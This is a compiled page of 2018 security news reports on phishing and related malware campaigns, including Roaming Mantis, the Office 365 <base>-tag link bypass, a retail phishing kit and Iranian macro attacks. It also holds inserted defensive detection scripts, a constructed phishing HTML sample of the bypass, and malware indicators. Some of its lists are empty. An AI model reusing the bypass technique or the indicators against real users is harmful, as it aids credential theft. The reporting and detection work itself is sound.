- Phishing -

Last update 09.10.2017 13:16:51



Agari Employs Active Defense to Probe Nigerian Email Scammers
24.5.2018 securityweek 

Agari, a firm that offers protection against email-borne threats, has spent the last 10 months analyzing the targets, tactics and identities of 10 separate criminal organizations. All ten organizations concentrate on email scam attacks; and nine of the ten are located in Nigeria.

While this does not prove that 90% of email scams come out of Nigeria, it is probably fair to say that Nigeria dominates this vector. The organizations were originally selected via scam emails targeted at Agari customers and blocked by Agari software. But Agari's analysis is far more than just an investigation into known scamware.

Chief scientist Markus Jakobsson told SecurityWeek that he and his team developed a method of gaining access to the scammers' own mailboxes, using what he describes as responsible active defense. The responsible element includes gaining FBI 'acquiescence' on the project. It is described as 'active defense' because it falls short of 'hacking back'. "You could describe it," he told SecurityWeek, "as a process of socially engineering the social engineers."

During the course of the project using this methodology, he and his team captured 78 criminal email accounts belonging to 10 different criminal organizations and containing 59,652 unique emails. In a report (PDF) published Tuesday, Agari was able to analyze the process and progress of email scams rather than just the content of individual scam emails.

Just like cybercriminals globally, the Nigerian scammers are becoming more sophisticated (using, for example, persistent and stealthy malware to penetrate organizations' email accounts), and are beginning to direct their attention against commercial organizations rather than individual computer users. As elsewhere, 'profit' is the motive: business email compromise (BEC) attacks require less individual effort for a much higher return.

Agari's research shows that the average BEC incident nets $35,000 for the criminals. 3.97% of people who answer a BEC email become victims -- and 24% of all email scams are now BEC. In June 2017, the FBI reported that the total worldwide dollar loss to BEC scams was in the region of $5.3 billion.

BEC works by the scammer masquerading as the company president or CEO, and requesting that Finance should send an urgent payment to a customer or business partner. The figures show that it is remarkably successful. But despite its success and despite the higher returns on effort, it is not the most frequent scam. That remains -- from the same criminal organizations -- the romance scam.

This is a primary method, along with work-from-home scams, used to recruit the money mules needed to get money out of the country (asking Finance to wire money direct to Nigeria or China or the Philippines would probably fail at the first hurdle). "Recruiting money mules is a full-time effort for each of the groups we captured. As the scammer groups are typically based overseas, a successful scamming operation is entirely dependent on money transfer techniques that evade suspicion."

Typically, a romance scam works by first making contact through a dating website. As soon as possible, the conversation is moved to a separate communications channel, and the scammer starts to ask for small sums of money to help with some contrived hardship. "Once the victim starts complaining about money, offer them a way to get all of their money back by simply cashing a couple of checks and sending part of the money to the scammer via MoneyGram or Western Union."

Once this happens, the romance victim becomes susceptible to blackmail and a money mule (or money launderer) has been recruited. Money scammed from other victims is not wired directly abroad, but wired to the local mule's bank account, and from there on to its overseas destination.

The details of such scams -- and many more categories are discussed in the Agari report -- are already well-understood. What is new, however, is Agari's ability to monitor the captured criminal email accounts over time and see the scam unfolding; both the scammers' requests and the victims' replies.

On several occasions Agari was able to step in and warn the victim. In November 2017, for example, it warned 5 real estate firms that their email had been compromised. In April 2018, "an Agari researcher identified [a] BEC attack and was able to warn the accounts payable team just in time to reverse the wire payment. The response from the victim was a condemnation of the attacker using words too colorful to print."

The Agari project is an example of the growing determination of cyber defenders to stop being entirely reactive to threats and to begin an offensive against the attackers. It is an excellent example of the potential of active defense. Not only was Agari able to disrupt criminal activity; capturing the criminals' email accounts also enabled it to identify many of the individual criminals.

"In close partnership with law enforcement, our customers and our partners," says the report, "Agari will continue to capture and report identity-based attacks and help turn the tide of online crime."

Agari raised $22 million Series D funding in May 2016, bringing the total raised by the company to $44.7 million.

Roaming Mantis dabbles in mining and phishing multilingually
22.5.2018 Kaspersky

In April 2018, Kaspersky Lab published a blogpost titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis is Android malware designed to spread via DNS hijacking. Based on our telemetry data, this activity is located mostly in Asia (South Korea, Bangladesh and Japan). Potential victims were redirected by DNS hijacking to a malicious web page that distributed a Trojanized application spoofing Facebook or Chrome, which the user then installed manually. The application actually contained an Android Trojan-Banker.

Soon after our publication it was brought to our attention that other researchers were also focused on this malware family. There was also another publication after we released our own blog. We’d like to acknowledge the good work of our colleagues from other security companies McAfee and TrendMicro covering this threat independently. If you are interested in this topic, you may find the following articles useful:

Android Banking Trojan MoqHao Spreading via SMS Phishing in South Korea
XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing
In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.

27 languages: targeting the world
In our previous blogpost we mentioned that a user attempting to connect to any websites while using a hijacked DNS, will be redirected to malicious landing pages on the rogue server. The landing page displays a popup message that corresponds to the language settings of the device and which urges the user to download a malicious apk file named ‘facebook.apk’ or ‘chrome.apk’.
Kaspersky Lab confirmed several languages hardcoded in the HTML source of the landing page to display the popup message.

The attackers substantially extended their target languages from four to 27, including European and Middle Eastern languages. And yet, they keep adding comments in Simplified Chinese.
But, of course, this multilingualism is not limited to the landing page. The most recent malicious apk (MD5: fbe10ce5631305ca8bf8cd17ba1a0a35) was also expanded to support 27 languages.

The landing page and malicious apk now support the following languages:

Traditional Chinese
Simplified Chinese
We believe the attacker made use of an easy method to potentially infect more users, by translating their initial set of languages with an automatic translator.

Apple phishing site for iOS device
Previously, this criminal group focused on Android devices only. They have apparently changed their monetizing strategy since then. The attackers now target iOS devices as well, using a phishing site to steal user credentials. When a user connects to the landing page via iOS devices, the user is redirected to ‘http://security.apple.com/’:

A legitimate DNS server wouldn’t be able to resolve a domain name like that, because it simply doesn’t exist. However, a user connecting via a compromised router can access the landing page because the rogue DNS service resolves this domain to the IP address 172.247.116[.]155. The final page is a phishing page mimicking the Apple website with the very reassuring domain name ‘security.apple.com’ in the address bar of the browser.

The phishing site steals user ID, password, card number, card expiration date and CVV. The HTML source of the phishing site also supports 25 languages.

The supported languages are almost the same as on the landing pages and malicious apk files – only Bengali and Georgian are missing from the phishing site.

Web crypto mining for PC
Looking at the HTML source code of the landing page, we also discovered a new feature: web mining via a special script executed in the browser. More details about web miners can be found in our blogpost ‘Mining is the new black’.

Coinhive is the most popular web miner used by cybercriminals around the world. When a user connects to the landing page from a PC, the CPU usage will drastically increase because of the crypto mining activity in the browser.

Real C2 destination is hidden in email subject
Older malicious apk samples include a legitimate website, accounts and a regular expression for retrieving the real C2 address, which the malware connects to by using a web socket. This process for obtaining its C2 changes in more recent samples, further described below:

Sample 1
MD5: f3ca571b2d1f0ecff371fb82119d1afe
Date: March 29 2018
File name: chrome.apk
Legitimate web: http://my.tv.sohu[.]com/user/%s
Email: n/a
Accounts: 329505231, 329505338, wokaixin158998
RegExp: “<p>([\u4e00-\u9fa5]+?)</p>\s+</div>”
Encrypted dex: \assets\db
Encoding: Base64

Sample 2
MD5: 4d9a7e425f8c8b02d598ef0a0a776a58
Date: April 7 2018
File name: facebook.apk
Legitimate web: https://www.baidu[.]com/p/%s/detail
Email: n/a
Accounts: haoxingfu88, haoxingfu11
RegExp: “公司</span>([\\u4e00-\\u9fa5]+?)<“
Encrypted dex: \assets\data.sql
Encoding: Base64 + zlib compression

Sample 3
MD5: fbe10ce5631305ca8bf8cd17ba1a0a35
Date: May 14 2018
File name: $random_num{8}.apk
Legitimate web: n/a
Email: @outlook.com
RegExp: “abcd”
Encrypted dex: \assets\data.sql
Encoding: Base64 + zlib compression

Older samples retrieved the next C2 by accessing the legitimate website, extracting a Chinese string from a specific part of the HTML code, and decoding it. This scheme has changed in the recent sample: instead of fetching the string over HTTP, it now uses an email protocol to retrieve the C2.

The malware connects to an email inbox using hardcoded outlook.com credentials via POP3. It then obtains the email subject (in Chinese) and extracts the real C2 address using the string “abcd” as an anchor.
The old and new decoding functions are exactly the same.

We decoded the following next stage C2 servers:

Backdoor command “ping”
Kaspersky Lab observed that the previous malicious apk (MD5:f3ca571b2d1f0ecff371fb82119d1afe) had 18 backdoor commands to confirm victims’ environments and to control devices.
According to our analysis, the recent malicious apk (MD5:fbe10ce5631305ca8bf8cd17ba1a0a35) now implements 19 backdoor commands: “ping” was added.

The backdoor commands in the recent sample are as follows:

ping NEW
This additional command calls the OS ping command with the IP address of the C2 server. By running this, the attackers validate the availability of the server, packet travel time or detect network filtering in the target network. This feature can also be used to detect semi-isolated research environments.

Auto-generating apk file and filename
Roaming Mantis uses a very simple detection evasion trick on the malicious server. It entails the landing page generating a filename for the malicious apk file using eight random numbers.

Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018. It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes. This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.
However, the malicious apk still contains a loader inside ‘classes.dex’ and an encrypted payload inside ‘\assets\data.sql’ that are identical to those in the previous variants. For security researchers, we have added MD5 hashes of the decrypted payloads, rather than hashes of the whole apk files, to the IoC section of this report, as well as a few full apk hashes that were uploaded to VirusTotal.
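The traits described in this section (the non-existent ‘security.apple.com’ host that only a hijacked resolver can answer, the fixed ‘facebook.apk’/‘chrome.apk’ names and the newer eight-digit random apk names) can be turned into simple detection logic for proxy and DNS telemetry. The script below is an added example, not Kaspersky's code; the log lines are constructed, and only the host 172.247.116.155 and the canary name come from the write-up.

```python
import re
from urllib.parse import urlsplit

# Indicators quoted from the write-up above. Everything else here is constructed.
KNOWN_BAD_HOSTS = {"172.247.116.155"}
CANARY_HOST = "security.apple.com"   # does not exist in legitimate DNS; the rogue DNS answers it
APK_NAME = re.compile(r"^(facebook|chrome|\d{8})\.apk$")   # fixed names or 8 random digits

# Constructed proxy log: timestamp client method url status
SAMPLE_PROXY_LOG = """\
2018-05-16T10:01:02Z 10.0.0.12 GET http://172.247.116.155/facebook.apk 200
2018-05-16T10:02:10Z 10.0.0.12 GET http://security.apple.com/ 200
2018-05-16T10:03:44Z 10.0.0.7 GET https://www.example.org/index.html 200
2018-05-16T10:05:31Z 10.0.0.9 GET http://192.0.2.44/48213957.apk 200
2018-05-16T10:06:00Z 10.0.0.9 GET https://cdn.example.org/chrome_update.apk 200
"""


def classify_url(url):
    """Return the list of campaign traits a requested URL matches (empty if none)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    filename = parts.path.rsplit("/", 1)[-1]
    reasons = []
    if host in KNOWN_BAD_HOSTS:
        reasons.append("known-bad-host")
    if host == CANARY_HOST:
        reasons.append("canary-host")       # only reachable behind a hijacked resolver
    if APK_NAME.match(filename):
        reasons.append("rogue-apk-name")
    return reasons


def scan_proxy_log(text):
    """Return (client, url, reasons) for every log line matching at least one trait."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue                         # malformed line, skip it
        client, url = fields[1], fields[3]
        reasons = classify_url(url)
        if reasons:
            hits.append((client, url, reasons))
    return hits


def dns_hijack_suspected(resolve):
    """True when the canary name resolves at all.

    `resolve` is injected (hostname -> list of IP strings, [] on NXDOMAIN) so the
    check runs offline here; in production wrap socket.gethostbyname_ex or a DNS
    library and run it from the network segment whose resolver you want to test.
    """
    return bool(resolve(CANARY_HOST))


if __name__ == "__main__":
    for client, url, reasons in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(client, url, ",".join(reasons))
```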

Rapidly improving malicious apk and landing pages
Since our first report, Roaming Mantis has evolved quickly. The update history shows how rapidly the threat has been growing:

The actors behind it have been quite active in improving their tools. As seen in the graph below, which shows the unique detected user counts per day according to KSN data, the count increased on May 5. That date is very close to the update date of the new features on the landing pages.

Geographical expansion
Kaspersky Lab products detect Roaming Mantis’s malicious apk files as ‘Trojan-Banker.AndroidOS.Wroba’. Below is the data from Kaspersky Security Network (KSN) based on the verdict ‘Trojan-Banker.AndroidOS.Wroba.al’ from May 1 to May 10, 2018.

It’s clear from this that South Korea, Bangladesh and Japan are no longer the worst affected countries; instead, Russia, Ukraine and India bore the brunt. According to data gathered between February 9 and April 9, the unique user count was 150. It’s worth mentioning that the most recent data shows more than 120 users of Kaspersky Lab products were affected in just 10 days.
Also, it’s important to note that what we see in the KSN data is probably a tiny fraction of the overall picture. There are two reasons for that:

Some users may be using other AV products or no products at all.
Roaming Mantis, after all, uses DNS hijacking, which prevents even our customers from reporting a detection. However, some devices made it through – probably due to switching to cellular data or connecting to another Wi-Fi network.
The Roaming Mantis campaign evolved significantly in a short period of time. The earliest report of this attack was made public by researchers from McAfee in August 2017. At that time, the Roaming Mantis distribution method was SMS and there was one target: South Korea. When we first reported this attack in April 2018, it had already implemented DNS hijacking and expanded its targets to the wider Asian region.
In our report of April this year, we called it an active and rapidly changing threat. New evidence shows a dramatic expansion in the target geography to include countries from Europe, the Middle East and beyond by supporting 27 languages in total. The attackers have also gone beyond Android devices by adding iOS as a new target, and recently started targeting PC platforms – the landing page PC users are redirected to is now equipped with the Coinhive web miner.
The evasion techniques used by Roaming Mantis have also become more sophisticated. Recent additions described in this post include a new method of retrieving the C2 via the email POP protocol, server-side dynamic auto-generation of apk files and filenames, and an additional command that can help identify research environments.
The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.

For our previous findings, please refer to the Securelist post Roaming Mantis uses DNS hijacking to infect Android smartphones.

Kaspersky products detect this malware as:

Kaspersky Lab products block the Coinhive web miner for PC.

Malicious hosts:

Malicious apks:

Decrypted payload (dex file) from \assets\data.sql:


Phishers Use New Method to Bypass Office 365 Safe Links
8.5.2018 securityweek 

Cybercriminals have been using a new method to ensure that the URLs included in their phishing emails bypass the Safe Links security feature in Office 365, cloud security company Avanan revealed on Tuesday.

Safe Links, offered as part of Microsoft’s Office 365 Advanced Threat Protection (ATP) solution, is designed to protect organizations against malicious links delivered through emails and documents. Safe Links checks the original URL to see if it has been blacklisted (by Microsoft or the ATP customer) or if it points to malware. If a malicious element is detected, the original link is replaced and users are alerted when they click on it.

Avanan says cybercriminals have found a simple way to bypass this security feature by using a <base> tag in the HTML header – basically splitting the malicious URL. Using this method, Safe Links only checks the base domain and ignores the rest – the link is not replaced and the user is allowed to access the phishing site.

Base tag phishing - Safe Links bypass

“At one time, email clients did not support the <base> tag, so every link needed to be an absolute URL. Support for relative URLs in email is a recent development and the behavior is client dependent. Older email clients will ignore the <base> tag, but web-based email clients, recent desktop clients and most mobile apps will now handle the <base> tag and recombine the URL into a clickable link,” Avanan explained.

The attack method, which Avanan has dubbed “baseStriker,” works against the Outlook clients, including the web-based, mobile and desktop applications, which support the <base> header tag. Gmail is not impacted and some security solutions, such as the one provided by Mimecast, protect users against these attacks.

While Avanan has only seen this method being exploited in phishing attacks, it believes the technique can also be leveraged to deliver ransomware and other types of malware.

Avanan discovered the use of this attack method after seeing that some phishing emails made it past filters included in Microsoft and Proofpoint products. An investigation revealed that the malicious messages that bypassed these filters had been using the <base> tag.

“What made this attack interesting was that the URLs that were making it through were already known by the major blacklist databases that Microsoft subscribes to,” Yoav Nathaniel, Avanan research engineer, told SecurityWeek.

According to Nathaniel, a majority of the phishing messages observed by Avanan purport to be DocuSign or Office 365 links and they lead to a fake login page.

“The FROM address is customized on a per-email basis to look like the email is an internal one. The FROM: takes the form of ‘targetcompany.com <name@realdomain.com>’ so the user will see ‘targetcompany.com’ as the name, often fooling the user into thinking it is an internal email address. The email is coming from a real email account so the sender passes SPF and DKIM,” Nathaniel said.

“The SUBJECT is customized on a per-email basis to seem like the message is an internal one. The SUBJECT is of the form ‘realemailaddress@targetcompany.com has sent you a document’,” he added. “The email includes the one or more logos including Office365 or DocuSign or other document sharing service as well as the standard boilerplate text that would be expected at the bottom of such an email. The emails are well-crafted with few or no spelling mistakes.”

Microsoft has been made aware of these attacks and the company has launched an investigation.

“Microsoft has a customer commitment to investigate reported security issues and provide resolution as soon as possible,” a Microsoft spokesperson told SecurityWeek. “We encourage customers to practice safe computing habits by avoiding opening links in emails from senders they don’t recognize.”

This is not the first time researchers have found a way to bypass Safe Links. Both Avanan and others have disclosed several methods in recent months.
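As an added illustration, not Avanan's or Microsoft's code, the checks below do what a filter must do to close the gap described above: resolve every link the way a <base>-aware client would (base href plus relative href) before matching the host against a blocklist, and flag the FROM display-name trick Nathaniel describes. The HTML body, sender headers and blocklist are constructed; `raw_hosts` shows what a filter that looks only at the bare href attribute sees.

```python
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed phishing body using the <base> split; not a real sample.
SAMPLE_HTML = """<html><head><base href="http://phish.example.net/"></head>
<body><p>realuser@targetcompany.example has sent you a document.</p>
<a href="docs/login.php?id=42">Review document</a>
<a href="https://www.docusign.example/">DocuSign</a></body></html>"""

BLOCKLIST = {"phish.example.net"}          # constructed blocklist entry


class _LinkCollector(HTMLParser):
    """Collects the first <base href> and every <a href> in document order."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if not href:
            return
        if tag == "base" and self.base is None:
            self.base = href            # browsers honour only the first <base>
        elif tag == "a":
            self.hrefs.append(href)


def _collect(html):
    p = _LinkCollector()
    p.feed(html)
    p.close()
    return p


def raw_hosts(html):
    """Hosts seen when inspecting only the href attributes (None for relative links)."""
    return [urlsplit(h).hostname for h in _collect(html).hrefs]


def resolve_links(html):
    """Absolute URLs a <base>-aware client would actually open."""
    p = _collect(html)
    return [urljoin(p.base or "", h) for h in p.hrefs]


def blocked_links(html, blocklist):
    """Recombined links whose host is on the blocklist."""
    return [u for u in resolve_links(html)
            if (urlsplit(u).hostname or "").lower() in blocklist]


_DOMAIN_LIKE = re.compile(r"^[a-z0-9.-]+\.[a-z]{2,}$", re.I)


def display_name_spoofs_domain(from_header):
    """True when the display name looks like a domain other than the sender's real one."""
    name, addr = parseaddr(from_header)
    name = name.strip()
    if "@" not in addr or not _DOMAIN_LIKE.match(name):
        return False
    return name.lower() != addr.rsplit("@", 1)[1].lower()


if __name__ == "__main__":
    print("href-only view:", raw_hosts(SAMPLE_HTML))
    print("recombined:", resolve_links(SAMPLE_HTML))
    print("blocked:", blocked_links(SAMPLE_HTML, BLOCKLIST))
    print(display_name_spoofs_domain("targetcompany.example <name@realdomain.example>"))
```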

Phishing campaign aimed at Airbnb users leverages GDPR as a bait
5.5.2018 securityaffairs

Cybercriminals are targeting Airbnb users with phishing emails that urge compliance with the new privacy regulation, the General Data Protection Regulation (GDPR).
The upcoming GDPR, which threatens severe penalties for non-compliance, is being used as a pretext to demand personal information from Airbnb users. Interest in the subject is very high among professionals and companies across many industries, so it is only natural that crooks try to take advantage of the situation.

Airbnb, like many other companies, is sending emails to inform users of changes to its privacy policy under the upcoming GDPR.

Cybercriminals are targeting Airbnb users demanding personal information and financial data referencing the GDPR.

Experts from Redscan are monitoring a campaign targeting Airbnb users with phishing messages like the following one:

“This update is mandatory because of the new changes in the EU Digital privacy legislation that acts upon United States-based companies, like Airbnb in order to protect European citizens and companies,” reads the phishing message, according to Redscan.


The extent of the campaign is still unclear; the crooks are targeting business email addresses harvested online.

The phishing messages pretend to be a GDPR information request sent by Airbnb to hosts of the service.

“The irony won’t be lost on anyone that cybercriminals are exploiting the arrival of new data protection regulations to steal people’s data,” Sky News cited Redscan Director of Cybersecurity Mark Nicholls as saying.

The phishing emails use a social engineering trick that is as simple as it is effective: the message informs hosts that they cannot accept new bookings or contact potential guests until they comply, because their accounts are not yet GDPR compliant.

The malicious emails use a domain that could appear legitimate: according to Redscan, in this campaign the attackers used the @mail.airbnb.work domain rather than the legitimate @airbnb.com domain.

If victims click the malicious link embedded in the email, they are redirected to a phishing page designed to request both personal and financial information.

“Modern phishing campaigns are becoming increasingly difficult to spot and people need to be extra vigilant when opening emails and clicking links, since it’s important to ensure they originate from a trusted source,” said Mark Nicholls, Redscan’s director of cybersecurity.

It is important to highlight that GDPR notifications sent by companies to their customers do not ask for users’ credentials, so be careful and stay vigilant.

New Advanced Phishing Kit Targets eCommerce
26.4.2018 securityweek

A new advanced phishing kit has surfaced, which provides miscreants with more than the usual one or two pages used to collect personal and financial data from victims, Check Point warns.

The phishing kit is currently being advertised on the Dark Web at $100-$300 and has been designed to target online users looking to shop at popular retailers, in an attempt to steal their personal details and credit card information.

Advertised by a certain [A]pache, the kit doesn’t only display a login page with a prompt for personal and financial information. Instead, it incorporates entire replicas of retail sites, Check Point's security researchers have discovered.

Through the kit’s backend interface, cybercriminals can create convincing fake retail product pages, in addition to being able to manage their entire phishing campaign. The [A]pache Next Generation Advanced Phishing Kit is mainly targeting users in Brazil with convincing replicas of Walmart, Americanas, Ponto Frio, Casas Bahia, Submarino, Shoptime and Extra.

“By preparing a site with discounted products that appear to be sold by a legitimate retailer, the threat actor can then lure victims into making a ‘purchase’, at which point they surrender their personal and financial information,” Check Point notes.

Miscreants downloading [A]pache’s multi-functioning phishing kit don’t need advanced technical abilities to get started with their own cyber-attacks. The kit comes with installation instructions that allow any actor to launch a campaign fast.

Packing a full suite of tools to carry out an attack, the kit seems aimed at those with a good knowledge of Portuguese, but the security researchers discovered that some U.S. brands were targeted as well.

To trick victims, the attackers use domain names similar to those of the legitimate sites. Once the fake domains have been registered, the miscreants deploy the kit to a PHP and MySQL supported web host, and then log in to the admin panel to configure the campaign.

Actors can select an email address to receive notifications; to enter the URL of the phishing site; to choose to disable ‘Boleto Bancário’ (and force victims to enter their credit card data); to insert legitimate product URLs from the retailer’s website for automatic import; and to manage the phished victim information.

“[A]pache has made a simple user interface within the admin panel where the threat actor can paste the product URL of the legitimate retailer and the kit will automatically import the product information into the phishing page. They can then view their ‘products’ and change their original prices,” Check Point explains.

The phishing sites also claim to be offering competitive prices, in an attempt to motivate potential ‘customers’ into clicking on items and proceeding to checkout. However, prices aren’t reduced by much, as that would raise suspicions. Highly valued and desired items are listed first, to entice potential victims.

Not only does the fake website look exactly like the target site, but an automated post-code look-up function for added conviction is also included in the phishing kit. Thus, unsuspecting victims would easily reveal their payment details, including the card’s CVV, and the attacker can view the stolen details in the admin panel.

The victim is instead notified that the payment process has failed, so as to avoid arousing suspicion when the purchased fake products do not arrive. The attackers would often take down the fake sites after successful attacks, to avoid being caught.

In one case, the researchers found a custom built ‘error 404’ site in use, which makes reference to a non-existent ‘Blue World Electronicos’ company. An English version of the page was found being used online on a few domains serving PayPal phishing scams.

Thus, the researchers discovered that the author of the Brazilian phishing kit appears to be behind kits targeting US victims as well. After finding the handle ‘Douglas Zedn’ in the control panel of the Walmart phishing site, the researchers managed to link it to the individual’s Steam account and then to their Twitter account.

“With some reports claiming that 91% of cyberattacks and data breaches begin with a phishing email, phishing remains a constant threat for stealing financial information, intellectual property, and even interfering with elections. For this reason, consumers and businesses alike must ensure they have the latest protections for safeguarding against such threats,” Check Point concludes.

Mobile Phishing Attacks Up 85 Percent Annually
12.4.2018 securityweek 

The rate at which users are receiving and clicking on phishing URLs on their mobile devices has increased at an average rate of 85% per year since 2011, mobile security firm Lookout reports.

What’s more worrisome is the fact that 56% of users received and clicked on a phishing URL that bypasses existing layers of defense, the security firm says. On average, a user clicked on a mobile phishing URL six times per year.

In a new report (PDF) analyzing the present state of mobile phishing, the security company explains that attackers are successfully circumventing existing phishing protections to target the mobile devices. Thus, they manage to expose sensitive data and personal information at an alarming rate, the company claims.

With over 66% of emails first opened on a mobile device and email arguably the first point of attack for a phishing actor, unprotected emails on a mobile device can easily turn into a new avenue for attack.

“Most corporations are protected from email-based phishing attacks through traditional firewalls, secure email gateways, and endpoint protection. In addition, people today are getting better at identifying phishing attacks. Mobile, however, has made identifying and blocking phishing attacks considerably more difficult for both individuals and existing security technologies,” Lookout notes.

The security firm claims that existing phishing protections are not adequate for mobile devices, where the relatively small screen makes distinguishing a real login page from a fake one highly problematic. On mobile, email is only one of the possible attack vectors, with truncated malicious URLs and apps accessing potentially malicious links also being used for compromise.

SMS and MMS also provide attackers with new means of phishing, not to mention popular and heavily used personal social media apps and messaging platforms such as WhatsApp, Facebook Messenger, and Instagram. According to Lookout, more than 25% of employees click on a link in an SMS message sent from a spoofed phone number.

One attacker known to have used a non-email means of phishing is the threat actor behind ViperRAT, who engaged in conversations with their victims after posing as women on social media platforms. Once they had established trust, the actor asked the victims to download an app for “easier communication.”

In another example, an attacker targeted iOS and Android users via Facebook Messenger, suggesting that they appeared in a YouTube video. When clicking on the provided link, the user was served a fake Facebook login page meant to steal their credentials.

Lookout also notes that users are three times more likely to click on a suspicious link on a phone than on a PC. On a mobile device, users can’t always see the entire link they click on, as they would on a desktop, and there isn’t always a firewall to keep the device protected, as would be the case with a PC in a corporate environment.

“Mobile phishing is increasingly the tip of the spear for sophisticated, large-scale attacks. Some of the most active attacks come from mobile advanced persistent threats, or mAPTs,” Lookout also notes.

While an APT is a group, usually a nation-state, which can persistently and effectively target other nation-states, businesses, or individuals to steal information, a mAPT brings such attacks to mobile. Dark Caracal and Pegasus are only a couple of the most recent examples of such attacks.

Furthermore, because some applications contain URLs in the codebase to communicate and fetch information in real-time, attackers can abuse the functionality for phishing. Thus, enterprises should worry about “benign apps” that access malicious URLs.

“For example, apps often use advertising to make money. In order to do so, they incorporate ad SDKs into their code. These SDKs connect to URLs behind the scenes in order to display ads to the end user. If a benign app uses an ad SDK run by an attacker, that attacker may use the SDK to access malicious URLs in order to display ads meant to trick the end user into giving over sensitive data,” Lookout explains.

European police agencies coordinated by Europol arrested 20 people for Spear Phishing scam
31.3.2018 securityaffairs 

An international operation conducted by the Romanian National Police and the Italian National Police, with support from Europol, the Joint Cybercrime Action Taskforce (J-CAT), and Eurojust, led to the arrest of 20 individuals involved in a banking spear phishing scam.
According to the investigators, the banking phishing scam allowed crooks to defraud bank customers of €1 million ($1.23 million).

The international investigation lasted two years and culminated in a series of coordinated police raids: 9 of the individuals were arrested in Romania and 11 in Italy.

The Romanian Police raided 3 houses in the country, while the Italian police raided 10 houses and conducted several computer searches.

“A two-year long cybercrime investigation between the Romanian National Police and the Italian National Police, with the support of Europol, its Joint Cybercrime Action Taskforce (J-CAT) and Eurojust, has led to the arrest of 20 suspects in a series of coordinated raids on 28 March. 9 individuals in Romania and 11 in Italy remain in custody over a banking fraud netted EUR 1 million from hundreds of customers of 2 major banking institutions.” reads the press release published by the Europol.

“The Romanian authorities have conducted 3 house searches, while the Italian National Police ordered the execution of 10 home and computer searches, involving more than 100 Italian policemen.”

According to Europol, the banking fraud scheme netted €1 million from hundreds of customers of the 2 major banks that were targeted.

Most of the gang members are Italian. They used spear phishing messages posing as tax authorities in an attempt to harvest victims' online banking credentials.

“While the most common phishing scams blast out millions of generic e-mails, spear phishing emails are personally addressed to targeted stakeholders with content to make it appear from a reputable source, such as a bank. Recipients are encouraged to click on a link, which will lead to a fake version of a legitimate website where their account or contact details can be stolen.” continues the press release.

The authorities had been monitoring the gang's activity since 2016. Once the attackers stole credentials through spear phishing messages, they logged into their victims’ accounts and drained the funds.

The gang cashed out through ATMs in Romania, using payment cards associated with criminal accounts.

The crime gang used encrypted chat applications for communication and, according to the police, also used intimidating and punitive methods against affiliates and competitors to establish power.

The authorities suspect the group of other illegal activities, including money laundering, as well as drug and human trafficking, prostitution, and participation in a criminal organization.

This is the second successful operation announced by Europol in a few days; earlier this week, the agency announced the arrest of the head of the crime ring behind the Carbanak gang, which has targeted banks worldwide since 2013.

Iran-linked group TEMP.Zagros now targets Asia and Middle East regions
19.3.2018 securityaffairs
Experts at FireEye uncovered a new massive phishing campaign conducted by TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.
Iranian hackers are among the most active threat actors in this period: researchers at FireEye uncovered a new massive phishing campaign targeting Asia and Middle East regions from January 2018 to March 2018.

The group behind the campaign is known as TEMP.Zagros, aka MuddyWater, and according to the experts it is now adopting new tactics, techniques, and procedures.

“We observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East. We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017.” reads the analysis published by the experts at FireEye.

“This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.”

TEMP.Zagros was first spotted by researchers at Palo Alto Networks in 2017, when the hackers targeted various industries in several countries with spear-phishing messages.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

Last week, experts at Trend Micro also attributed the new wave of attacks to the MuddyWater threat actor.

“We discovered a new campaign targeting organizations in Turkey, Pakistan and Tajikistan that has some similarities with an earlier campaign named MuddyWater, which hit various industries in several countries, primarily in the Middle East and Central Asia.” states the analysis published by Trend Micro.

According to the FireEye report, the TEMP.Zagros attackers are using a backdoor dubbed POWERSTATS and reusing a known technique for lateral movement.

Each of these macro-based documents used similar techniques for code execution, persistence, and communication with the command and control (C2) server.

The hackers reused AppLocker bypass and lateral movement techniques for the purpose of indirect code execution. The IP address used by the lateral movement technique was replaced with the local machine's IP address, so that the same technique achieved code execution on the local system.

“In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets.” continues FireEye.

TEMP.Zagros phishing

The campaign that started on Jan. 23 involved a macro-based document that dropped a VBS file and an INI file containing a Base64-encoded PowerShell command.

The Base64-encoded PowerShell command is decoded and executed by PowerShell, using a command line generated by the VBS file when it runs under WScript.exe.

Attackers used a different VBS script for each sample, employing different levels of obfuscation and different ways of invoking the next stage of the process tree.

Starting from Feb. 27, 2018, the hackers used a new variant of the macro that does not rely on VBS for PowerShell code execution. The new variant uses a new code execution technique leveraging INF and SCT files.
